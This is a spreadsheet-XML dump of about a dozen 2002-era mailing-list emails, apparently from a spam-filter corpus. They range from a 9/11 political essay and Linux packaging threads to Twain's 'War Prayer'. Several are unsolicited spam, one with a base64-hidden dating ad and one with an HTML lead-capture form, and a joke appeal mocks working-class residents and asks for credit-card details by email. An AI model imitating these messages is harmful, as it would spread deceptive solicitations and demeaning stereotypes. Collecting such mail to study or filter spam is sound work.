 the attacks of September 11 will not merely be the destruction of al Qaeda,
 but also the complete repudiation of the Taliban, the Iranian mullocracy,
 the plague of the Pakistani madrassas, and any other would-be fundamentalist
 paradise on earth.
 Foreign relations will not be the same in our generation. Our coalition with
 Europe, we learn, was not a partnership, but more mere alphabetic
 nomenclature and the mutual back scratching of Euro-American globetrotters 
 a paper alliance without a mission nearly 15 years after the end of the Cold
 War. The truth is that Europe, out of noble purposes, for a decade has
 insidiously eroded its collective national sovereignty in order to craft an
 antidemocratic EU, a 80,000-person fuzzy bureaucracy whose executive power
 is as militarily weak as it is morally ambiguous in its reliance on often
 dubious international accords. This sad realization September 11 brutally
 exposed, and we all should cry for the beloved continent that has for the
 moment completely lost its moral bearings. Indeed, as the months progressed
 the problems inherent in "the European way" became all too apparent:
 pretentious utopian manifestos in lieu of military resoluteness, abstract
 moralizing to excuse dereliction of concrete ethical responsibility, and
 constant American ankle-biting even as Europe lives in a make-believe Shire
 while we keep back the forces of Mordor from its picturesque borders, with
 only a few brave Frodos and Bilbos tagging along. Nothing has proved more
 sobering to Americans than the skepticism of these blinkered European
 hobbits after September 11.
 America learned that "moderate" Arab countries are as dangerous as hostile
 Islamic nations. After September 11, being a Saudi, Egyptian, or Kuwaiti
 means nothing special to an American  at least not proof of being any more
 friendly or hostile than having Libyan, Syrian, or Lebanese citizenship.
 Indeed, our entire postwar policy of propping up autocracies on the triad of
 their anticommunism, oil, and arms purchases  like NATO  belongs to a
 pre-9/11 age of Soviet aggrandizement and petroleum monopolies. Now we learn
 that broadcasting state-sponsored hatred of Israel and the United States is
 just as deadly to our interests as scud missiles  and as likely to come
 from friends as enemies. Worst-case scenarios like Iran and Afghanistan
 offer more long-term hope than "stable regimes" like the Saudis; governments
 that hate us have populations that like us  and vice versa; the Saudi royal
 family, whom 5,000 American troops protect, and the Mubarak autocracy, which
 has snagged billions of American dollars, are as afraid of democratic
 reformers as they are Islamic fundamentalists. And with good reason: Islamic
 governments in Iran and under the Taliban were as hated by the masses as
 Arab secular reformers in exile in the West are praised and championed.
 The post-9/11 domestic calculus is just as confusing. Generals and the
 military brass call civilians who seek the liberation of Iraq "chicken
 hawks" and worse. Yet such traditional Vietnam-era invective I think rings
 hollow after September 11, and sounds more like McClellan's shrillness
 against his civilian overseers who precipitously wanted an odious slavery
 ended than resonant of Patton's audacity in charging after murderous Nazis.
 More Americans were destroyed at work in a single day than all those
 soldiers killed in enemy action since the evacuation of Vietnam nearly 30
 years ago. Indeed, most troops who went through the ghastly inferno of
 Vietnam are now in or nearing retirement; and, thank God, there is no
 generation of Americans in the present military  other than a few thousand
 brave veterans of the Gulf, Mogadishu, and Panama  who have been in
 sustained and deadly shooting with heavy casualties. Because American
 soldiers and their equipment are as impressive as our own domestic security
 is lax, in this gruesome war it may well be more perilous to work high up in
 lower Manhattan, fly regularly on a jumbo jet, or handle mail at the
 Pentagon or CIA than be at sea on a sub or destroyer.
 Real concern for the sanctity of life may hinge on employing rather than
 rejecting force, inasmuch as our troops are as deadly and protected abroad
 as our women, children, aged, and civilians are impotent and vulnerable at
 home. It seems to me a more moral gamble to send hundreds of pilots into
 harm's way than allow a madman to further his plots to blow up or infect
 thousands in high-rises.
 Politics have been turned upside down. In the old days, cynical
 conservatives were forced to hold their noses and to practice a sometimes
 repellent Realpolitik. In the age of Russian expansionism, they were loathe
 to champion democracy when it might usher in a socialist Trojan Horse whose
 belly harbored totalitarians disguised as parliamentarians. Thus they were
 so often at loggerheads with nave and idealist leftists.
 No longer. The end of the specter of a deadly and aggressive Soviet
 Communism has revived democratic ideology as a force in diplomacy. Champions
 of freedom no longer sigh and back opportunistic rightist thugs who promise
 open economics, loot their treasuries, and keep out the Russians. Instead,
 even reactionaries are now more likely to push for democratic governments in
 the Middle East than are dour and skeptical leftists. The latter, if
 multiculturalists, often believe that democracy is a value-neutral Western
 construct, not necessarily a universal good; if pacifists, they claim
 nonintervention, not justice, as their first priority. The Right, not the
 Left, now is the greater proponent of global freedom, liberation, and
 idealism  with obvious domestic ramifications for any Republican president
 astute enough to tap that rich vein of popular support.
 All this and more are the wages of the disaster of September 11 and the
 subsequent terrible year  and yet it is likely that, for good or evil, we
 will see things even more incredible in the twelve months ahead.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] FW: please give generously
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----Original Message-----
 Subject: please give generously
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; Please give generously...
 &gt; &gt;
 &gt; &gt; URGENT - DUDLEY EARTHQUAKE APPEAL
 &gt; &gt;
 &gt; &gt; At 00:54 on Monday 23 September an earthquake measuring 4.8 on the
 &gt; &gt;
 &gt; &gt; Richter scale hit Dudley,UK causing untold disruption and distress -
 &gt; &gt;
 &gt; &gt; * Many were woken well before their giro arrived
 &gt; &gt;
 &gt; &gt; * Several priceless collections of mementos from the Balearics and
 &gt; &gt;
 &gt; &gt; Spanish costas were damaged
 &gt; &gt;
 &gt; &gt; * Three areas of historic and scientifically significant litter were
 &gt; &gt;
 &gt; &gt; disturbed
 &gt; &gt;
 &gt; &gt; * Thousands are confused and bewildered, trying to come to terms with
 &gt; &gt;
 &gt; &gt; the fact that something interesting has happened in Dudley
 &gt; &gt;
 &gt; &gt; One resident, Donna-Marie Dutton, a 17 year old mother-of-three said "It
 &gt; &gt;
 &gt; &gt; was such a shock, little Chantal-Leanne came running into my bedroom
 &gt; &gt;
 &gt; &gt; crying. My youngest two, Tyler-Morgan and Megan-Storm slept through it.
 &gt; &gt;
 &gt; &gt; I was still shaking when I was watching Trisha the next morning."
 &gt; &gt;
 &gt; &gt; Apparently though, looting did carry on as normal.
 &gt; &gt;
 &gt; &gt; The British Red Cross have so far managed to ship 4000 crates of Sunny
 &gt; &gt;
 &gt; &gt; Delight to the area to help the stricken masses.
 &gt; &gt;
 &gt; &gt; Rescue workers are still searching through the rubble and have found
 &gt; &gt;
 &gt; &gt; large quantities of personal belongings including benefit books and
 &gt; &gt;
 &gt; &gt; jewellery from Elizabeth Duke at Argos.
 &gt; &gt;
 &gt; &gt; HOW YOU CAN HELP
 &gt; &gt;
 &gt; &gt; * 2 buys chips, scraps and blue pop for a family of four
 &gt; &gt;
 &gt; &gt; * 10 can take a family to Stourport for the day, where children can
 &gt; &gt;
 &gt; &gt; play on an unspoiled canal bank among the national collection of
 &gt; &gt;
 &gt; &gt; stinging nettles
 &gt; &gt;
 &gt; &gt; * 22p buys a biro for filling in a spurious compensation claim
 &gt; &gt;
 &gt; &gt; PLEASE ACT NOW
 &gt; &gt;
 &gt; &gt; Simply email us by return with your credit card details and we'll do the
 &gt; &gt;
 &gt; &gt; rest! If you prefer to donate cash, there are collection points
 &gt; &gt;
 &gt; &gt; available at your local branches of Argos, Iceland and Clinton Cards.
 &gt; &gt;
 _________________________________________________________________
 Join the world's largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Married but lonely ?                                                                    7012AzYa1-040jxGt0341bxgg-24
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A8_33A71B3A.A8744E52
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 NzQ5NmZjUUEyLTlsMTAgDQoNCkZvciB0aGUgbWVuOiAgDQoqQ3VycmVudGx5
 LCB0aGVyZSBhcmUgMTQyLDczNiBtYXJyaWVkIHdvbWVuIGluIHRoZSBVLlMu
 IA0Kd2hvIGFyZSBsb25sZXkgYW5kIGxvb2tpbmcgZm9yIHNvbWUgZnVuLiAg
 DQoNCkZvciB0aGUgd29tZW46DQoqQ3VycmVudGx5LCB0aGVyZSBhcmUgMTI2
 LDA4NSBtYXJyaWVkIG1lbiBpbiB0aGUgVS5TLiANCndobyBhcmUgbG9ubGV5
 IGFuZCBsb29raW5nIGZvciBzb21lIGZ1bi4NCg0KKmNoYXQgb25saW5lIHdp
 dGggdGhvdXNhbmRzIG9mIG90aGVycyAyNC83DQoNCipXZSd2ZSBwYWlyZWQg
 dXAgdGVucyBvZiB0aG91c2FuZHMgb2YgbG9uZWx5IG1hcnJpZWQgbWVuIGFu
 ZCB3b21lbiBpbiBsZXNzIHRoYW4gMiB5ZWFycywgd2l0aCBvdmVyIDI3IG1p
 bGxpb24gdmlzaXRvcnMgdG8gdGhlIHNpdGUuLi55b3UgZG9uJ3Qgd2FudCB0
 byBtaXNzIG91dCBvbiB0aGlzLiAgQnV0IGJlZm9yZSB5b3UgZW50ZXIgdGhl
 IHNpdGUsIHdlIGFzayB0aGF0IHlvdSBQTEVBU0UgUkVTUEVDVCBldmVyeW9u
 ZSdzIGZlZWxpbmdzLiAgWW91IG1heSByZWNlaXZlIG1lc3NhZ2VzIGZyb20g
 aW5kaXZpZHVhbHMgb2Ygd2hpY2ggeW91IG1heSBub3QgYmUgaW50ZXJlc3Rl
 ZCBpbiwgcmVnYXJkbGVzcywgcGxlYXNlIGJlIGNvbnNpZGVyYXRlLg0KQ29t
 ZSBjaGVjayBpdCBvdXQ6ICANCg0KaHR0cDovL3d3dy5hZHVsdGRhdGluZ3Nl
 cnZpY2UubmV0L3dlYm1hcnJpZWRhbmRsb29raW5nLyAgDQoNCg0KDQoNCg0K
 DQoNCg0KDQoNCg0KNjY4N3hBbFU2LTc2N0JzSk4zNjU0bGFRczctNTk3emF0
 VzUzNzlYQ2xrOC02bDQy
 ------=_NextPart_000_00A8_33A71B3A.A8744E52--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</si>
  <si>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 [SAtalk] testing the install
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason wrote:
 &gt; Phil R Lawrence said:
 &gt; 
 &gt; 
 &gt;&gt;&gt;something to watch out for is to use "nomime" =&gt; 1 in the Mail::Audit
 &gt;&gt;&gt;ctor; the M:A folks changed the API there.
 &gt;&gt;
 &gt;&gt;What has MIME to do with it?  I read in perldoc M:A that your suggestion 
 &gt;&gt;is less expensive, but how does that help S:A?
 &gt; 
 &gt; 
 &gt; M:A, for some reason, changes its base class depending on whether the
 &gt; incoming message is mime or not.  Therefore the Mail::Internet methods
 &gt; suddenly become unavailable for MIME messages...
 &gt; 
 &gt; (you do *not* want to know what I thought of that when I found it ;)
 As a new user of SA, I guess I'm having trouble connecting the dots.  If 
 I understand you:  If I don't use the "nomime" =&gt; 1 option and I recieve 
 MIME mail, the Mail::Internet modules become unavailable.
 Unavailable for which?  MA?  SA?  What do these methods do?  Does this 
 mean my incoming MIME mail won't be checked by SA unless I specify 
 "nomime" =&gt; 1?
 Thanks,
 Phil
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: catalogs.google.com - in time for xmas?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000205.html
 Date: 2002-09-30T23:14:34-08:00
 Watch out Yahoo Shopping and other shopping meta-sites. Google is at it again 
 with Google Catalogs. The only question in mind mind is this: Will it hit big 
 this Christmas shopping season or next year? Google Product Search and 
 Ratings....
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; Depends who writes it.  One guy will write a bug every 5 lines,
     R&gt; another every 5000 lines.  Put them both on a project and that
     R&gt; will average out to a bug every 4.995 lines.  
 And a Java program, due to the extensive class libraries, will weigh
 in at 10% the number of lines of the equivalent C program.  QED.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You Need Full Disclosure!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_4E25A6_01C20B30.71108900
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
 Get a free edition of Full Disclosure &lt;http://www.full-disclosure.com&gt;
 Do you run into competition?
 Do you need life insurance policy information?
 Do you search for the best policy for each customer?
 Do you ever have to defend against replacement? 	
  You NEED Full Disclosure
 Full Disclosure is easy-to-use policy research software. It covers
 universal life, whole life, variable life, and all types of survivorship
 life insurance. FD is the third party source companies, brokers, and
 financial professionals have at their fingertips when they need to know
 the facts regarding cash value life insurance contracts. 	
 Full Disclosure is not an illustration system. It IS a comprehensive
 analytical and benchmarking tool that gives you apple-to-apple
 comparisons of illustrated values, historical performance,
 specifications, features, current and guaranteed policy costs and more!
 To celebrate the introduction of our newest easy-to-use software
 platform we are offering you aFREE EDITION 	
 Order any edition of Full Disclosure and take one FREE. Write down your
 offer code - 7765 - then click below to go to our website and order
 online.
 There is nothing else like Full Disclosure.
 Subscribe Online Today!
 877-864-3833 - www.full-disclosure.com &lt;http://www.full-disclosure.com&gt;
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; 
 ------=_NextPart_000_4E25A6_01C20B30.71108900
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;You Need Full Disclosure!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"552" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#ffffff" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td  valign=3D'top'&gt;&lt;a =
 href=3D"http://www.full-disclosure.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/blease/header.gif" width=3D"550" =
 height=3D"270" border=3D"0" alt=3D"Get a free edition of Full =
 Disclosure"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center" bgcolor=3D"#ffffcc"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;&lt;b&gt;
             Do you run into competition?&lt;br&gt;
             Do you need life insurance policy information?&lt;br&gt;
             Do you search for the best policy for each customer?&lt;br&gt;
             Do you ever have to defend against replacement?&lt;/b&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td bgcolor=3D"#ffffcc"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/blease/need.gif" width=3D"550" =
 height=3D"55" alt=3D"You NEED Full Disclosure"&gt;=20
             &lt;center&gt;
               &lt;table width=3D"500" border=3D"2" cellspacing=3D"0" =
 cellpadding=3D"6" bgcolor=3D"#ffffff"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#000000"&gt;&lt;b&gt;
                     Full Disclosure is easy-to-use policy research =
 software. It covers universal=20
                     life, whole life, variable life, and all types of =
 survivorship=20
                     life insurance. FD is the third party source =
 companies, brokers,=20
                     and financial professionals have at their fingertips =
 when=20
                     they need to know the facts regarding cash value =
 life insurance=20
                     contracts.&lt;/b&gt;&lt;/font&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#000000"&gt;&lt;b&gt;
                     Full Disclosure is not an illustration system. It IS =
 a comprehensive=20
                     analytical and benchmarking tool that gives you =
 apple-to-apple=20
                     comparisons of illustrated values, historical =
 performance,=20
                     specifications, features, current and guaranteed =
 policy costs=20
                     and more!&lt;/b&gt;&lt;/font&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#000000"&gt;&lt;b&gt;
                     To celebrate the introduction of our newest =
 easy-to-use software=20
                     platform we are offering you a&lt;font =
 color=3D"#FF0000"&gt;FREE EDITION&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#000000"&gt;&lt;b&gt;
                       Order any edition of &lt;font color=3D"#FF0000"&gt;Full =
 Disclosure&lt;/font&gt;=20
                       and take one &lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;. =
 Write down=20
                       your offer code - &lt;font =
 color=3D"#FF0000"&gt;7765&lt;/font&gt; - then=20
                       click below to go to our website and order =
 online.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/center&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td height=3D"18" bgcolor=3D"#ffffcc" align=3D"center"&gt;=20
             &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;&lt;b&gt;
                 There is nothing else like Full Disclosure.&lt;br&gt;
                 &lt;font color=3D"#69026D"&gt;Subscribe Online =
 Today!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;a href=3D"http://www.full-disclosure.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/blease/phone2.gif" width=3D"550" =
 height=3D"250" border=3D"0" alt=3D"877-864-3833 - =
 www.full-disclosure.com"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center" bgcolor=3D"#ffffcc"&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"4" align=3D"center" =
 bgcolor=3D"#6AC029"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"3" color=3D"#69026D"&gt;Please fill out the form below =
 for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"3" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#69026D"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"3" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#69026D"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"3" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#69026D"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"3" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#69026D"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"3" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#69026D"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"custsrv@full-disclosure.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Blease InsuranceIQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anybody=20
         to receive our mailings who does not wish to receive them. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;br&gt;
         &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_4E25A6_01C20B30.71108900--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Gabber packages for 8.0 (was: All set for Red Hat Linux 8.0)
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :
 &gt; I'm facing another problem right now. It looks like libsigc++ is no
 &gt; longer included in the distribution, and gtkmm won't compile without it
 &gt; :-/ I guess I'll have to repackage it myself for 8.0 (assuming it's
 &gt; possible).
 Well, I've made an updated libsigc++ 1.0.4 package. It rebuilds cleanly on
 7.3 but the *.so* libraries are missing when trying to rebuild on 8.0 (the
 .a and .la files and everything else is though).
 Do you have an idea of what the problem may be? Julian : Do you want the
 .src.rpm to try to find the cause?
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.19 0.15 0.16
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: &lt;nettime&gt; The War Prayer
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure Patton used it.
 I'm all for using it in the coming war with Iraq.
 Yet I'd be queasy about doing it in the Philippines circa 1905, which
 was his point.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.
 A.
 &gt; Hettinga
 &gt; Sent: Monday, September 16, 2002 9:44 PM
 &gt; To: Digital Bearer Settlement List; fork@spamassassin.taint.org
 &gt; Subject: &lt;nettime&gt; The War Prayer
 &gt; 
 &gt; 
 &gt; --- begin forwarded text
 &gt; 
 &gt; 
 &gt; Status: RO
 &gt; Date: Mon, 16 Sep 2002 14:57:27 -0700
 &gt; To: nettime-l@bbs.thing.net
 &gt; From: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 &gt; Subject: &lt;nettime&gt; The War Prayer
 &gt; Sender: nettime-l-request@bbs.thing.net
 &gt; Reply-To: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 &gt; 
 &gt; The following prayer is from a story by Mark Twain, and was quoted by
 &gt; Lewis
 &gt; Laphan in the October issue of Harper's magazine. It occurs at the
 very
 &gt; end
 &gt; of an excellent article which I recommend to you.
 &gt; 
 &gt; In the story, an old man enters a church where the congregation has
 been
 &gt; listening to an heroic sermon about "the glory to be won in battle by
 &gt; young
 &gt; patriots armed with the love of God." He usurps the pulpit and prays
 the
 &gt; following:
 &gt; 
 &gt; "O Lord our God, help us to tear their soldiers to bloody shreads with
 our
 &gt; shells; help us to cover their smiling fields with the pale forms of
 their
 &gt; patriot dead; help us to drown the thunder of the guns with the
 shrieks of
 &gt; their wounded, writhing in pain; help us to lay waste their humble
 homes
 &gt; with
 &gt; a hurricane of fire; help us to wring the hearts of their unoffending
 &gt; widows
 &gt; with unavailing grief; help us to turn them out roofless with their
 little
 &gt; children to wander unfriended the wastes of their desolated land in
 rags
 &gt; and
 &gt; hunger and thirst, sports of the sun flames in summer and the icy
 winds of
 &gt; winter, broken in spirit, worn with travail, imploring Thee for the
 refuge
 &gt; of
 &gt; the grave and denied it -- for our sakes who adore Thee, Lord, blast
 their
 &gt; hopes, blight their lives, protract their bitter pilgrimage, make
 heavy
 &gt; their
 &gt; steps, water their way with their tears, stain the white snow with the
 &gt; blood
 &gt; of their wounded feet! We ask it, in the spirit of love, of Him Who is
 the
 &gt; Source of Love, and Who is the ever-faithful refuge and friend of all
 that
 &gt; are sore beset and seek His aid with humble and contrite hearts.
 Amen."
 &gt; 
 &gt; Twain wrote the story, "The War Prayer," in 1905 during the American
 &gt; occupation of the Philippines, but the story wasn't printed until
 1923,
 &gt; thirteen years after his death, because the editors thought it
 &gt; "unsuitable"
 &gt; for publication at the time it was written.
 &gt; 
 &gt; #  distributed via &lt;nettime&gt;: no commercial use without permission
 &gt; #  &lt;nettime&gt; is a moderated mailing list for net criticism,
 &gt; #  collaborative text filtering and cultural politics of the nets
 &gt; #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg
 body
 &gt; #  archive: http://www.nettime.org contact: nettime@bbs.thing.net
 &gt; 
 &gt; --- end forwarded text
 &gt; 
 &gt; 
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">Ah yes..
 Yet another case where 'marriage' is actually an inappropriate word
 for these guys.  What they want is 'housekeeper' 'dog' and
 'prostitute'.
 All I can say, is I hope these girls come out, take the men for what
 they have, be glorified housekeepers for as short a term as possible,
 and enjoy the free travel.
 Love my arse.
 -BB
 ALB&gt; ...an alternative to the "kind of de-feminized, over-sized, self-centered,
 ALB&gt; mercenary-minded lady available on the British singles scene,"
 ALB&gt; Glad to see American culture is making it's way into the British bars too :)
 ALB&gt; God bless us uncivilized bastards, every one.
 ALB&gt; Still, definately something not right about the below. People are now
 ALB&gt; cheaper then a decent laptop? (ok, so we knew that already)
 ALB&gt; -------------
 ALB&gt; Selling Wedded Bliss Big Business in Thailand
 ALB&gt; Thu Aug 29,10:19 AM ET
 ALB&gt; By Andrew Marshall
 ALB&gt; BANGKOK, Thailand (Reuters) - English dentist Ken Moylan came to Thailand
 ALB&gt; looking for a wife. It took two hours to find her.
 ALB&gt; "The first day I went out with Wan, she came back to my hotel and hung all
 ALB&gt; my clothes up and tidied the room. I thought it was marvelous," he said. "I
 ALB&gt; knew then there was something special."
 ALB&gt; Moylan, 49, is one of thousands of men who use introduction agencies to meet
 ALB&gt; -- and marry -- Thai women. He lives in England now with 28-year-old Wan,
 ALB&gt; who is expecting their first child.
 ALB&gt; Critics of marriage agencies say they exploit the grinding poverty of women
 ALB&gt; in developing countries, offering dreams of a new life in the West that
 ALB&gt; often turn sour. But Moylan says he has no regrets about coming to Thailand
